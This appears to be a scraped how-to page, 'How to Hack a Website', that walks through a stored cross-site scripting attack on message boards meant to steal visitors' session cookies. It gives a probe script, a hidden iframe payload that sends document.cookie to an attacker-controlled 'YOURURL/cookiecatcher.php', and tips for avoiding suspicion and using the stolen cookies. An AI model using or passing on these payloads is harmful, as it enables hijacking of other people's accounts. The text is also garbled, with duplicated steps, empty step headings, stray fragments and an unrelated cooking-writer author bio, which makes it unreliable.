How to Hack a Website
Find a vulnerable site where you can post content., Go to create a post., Create and upload your cookie catcher., Post with your cookie catcher., Use the collected cookies.
Step-by-Step Guide
-
Step 1: Find a vulnerable site where you can post content.
A message board is a good example.
Remember, if the site is secure then this will not work. window.alert(“test”) window.alert(“test”)window.alert(“test”) -
Step 2: Go to create a post.
You will need to type some special code into the “post” which will capture the data of all who click on it.
You’ll want to test to see if the system filters out code.
Post <script>window.alert(“test”)</script> If an alert box appears when you click on your post, then the site is vulnerable to attack. , The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins.
You’ll need a cookie catcher, which will capture your target’s cookies and reroute them.
Upload the catcher to a website you have access to and that supports php.
An example cookie catcher code can be found in the sample section. , Input a proper code into the post which will capture the cookies and sent them to your site.
You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need. -
Step 3: Create and upload your cookie catcher.
-
Step 4: Post with your cookie catcher.
-
Step 5: Use the collected cookies.
Detailed Guide
A message board is a good example.
Remember, if the site is secure then this will not work. window.alert(“test”) window.alert(“test”)window.alert(“test”)
You will need to type some special code into the “post” which will capture the data of all who click on it.
You’ll want to test to see if the system filters out code.
Post <script>window.alert(“test”)</script> If an alert box appears when you click on your post, then the site is vulnerable to attack. , The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins.
You’ll need a cookie catcher, which will capture your target’s cookies and reroute them.
Upload the catcher to a website you have access to and that supports php.
An example cookie catcher code can be found in the sample section. , Input a proper code into the post which will capture the cookies and sent them to your site.
You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
About the Author
Nancy Hart
Brings years of experience writing about cooking and related subjects.
Rate This Guide
How helpful was this guide? Click to rate: